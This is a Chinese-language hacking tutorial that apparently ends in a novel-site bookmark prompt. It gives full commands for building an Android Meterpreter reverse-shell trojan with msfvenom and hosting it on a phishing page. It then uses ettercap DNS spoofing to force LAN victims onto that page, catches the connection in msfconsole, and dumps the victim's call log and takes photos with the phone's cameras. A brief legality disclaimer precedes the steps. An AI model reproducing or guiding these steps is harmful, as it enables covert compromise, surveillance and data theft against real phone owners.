warning:kali渗透高级篇,出事新篁概不负责!!!
利用DNS劫持内网准备钓鱼网页诱导下载安装安卓木马
前言
内网渗透,非公网IP上线。 不得非法入侵他人设备,遵纪守法,天网恢恢疏而不漏
互联网非法外之地,还请各位兄弟谨记,且行且珍惜。
第一步
生成安卓木马
msfvenom -p android/meterpreter/reverse_tcp LHOST=kali本机ip LPORT=监听端口 R > /放置的目录/文件名.apk
复制
第二步制作钓鱼网页
在这里我已经简单的准备了一个页面 代码如下
将生成的木马和编写页面放置到/var/www/html/目录下
然后启动Apache2
systemctl start apache2
复制
第三步开启DNS劫持
*编辑ettercap的DNS文件
nano /etc/ettercap/etter.dns
复制
*启动ettercap
ettercap -G
复制
*操作步骤
在弹出的窗口选择自己的网卡然后扫描内网IP
选择网关 add to target 1 选择目标 add to target 2
点击图中的菜单在之后弹出的选项中选择第一个然后确定
然后我们开启攻击
开启攻击后我们打开插件双击dns_spoof进行DNS毒化操作
手机端状态
此时我们手机端无法联网,访问任何网页都是我们实现安排好的页面效果如下
可以看到木马是没有报毒的,至少在MIUI11下是没有提示有病毒,并且申请了很多的权限。
启动木马监听等待目标上线
我们在终端启动msfconsole依次执行:
use exploit/multi/handlerset payload android/meterpreter/reverse_tcpset LHOST 192.168.123.10 //kali 本机的ipset LPORT 9055 //监听上线的端口 需要与生成木马的时候填写一样
exploit //执行监听
复制
然后我们静等目标上线
上面这张图是目标上线后的样子,当目标上线后我们就可以停止DNS劫持了
当关闭劫持后目标恢复网络连接。
使用木马窃取信息
现在我们先使用木马窃取对方通话记录 在终端输入dump_calllog 此时返回的数据应该是
meterpreter > dump_calllog[*] Fetching 243 entries[*] Call log saved to calllog_dump_20191126214943.txt
meterpreter >
复制
然后我们去root目录下能看到抓取到的通话记录打开后
接下来利用木马进行拍照 在终端输入webcam_list获取目标手机的摄像头数量
meterpreter > webcam_list1: Back Camera2: Front Camera
meterpreter >
复制
返回给我们两个摄像头 一个前置一个后置 我们利用 webcam_snap -i 指定一个摄像头进行拍照
webcam_snap -i 1
复制
命令执行完成之后会自动打开照片展示出来
其中有些图片发不出来
抱歉,兄弟们
新篁只能做到这样了
少年,你想学黑客吗?想学?我教你啊!提示您:看后求收藏(同创文学网http://www.tcwxx.com),接着再看更方便。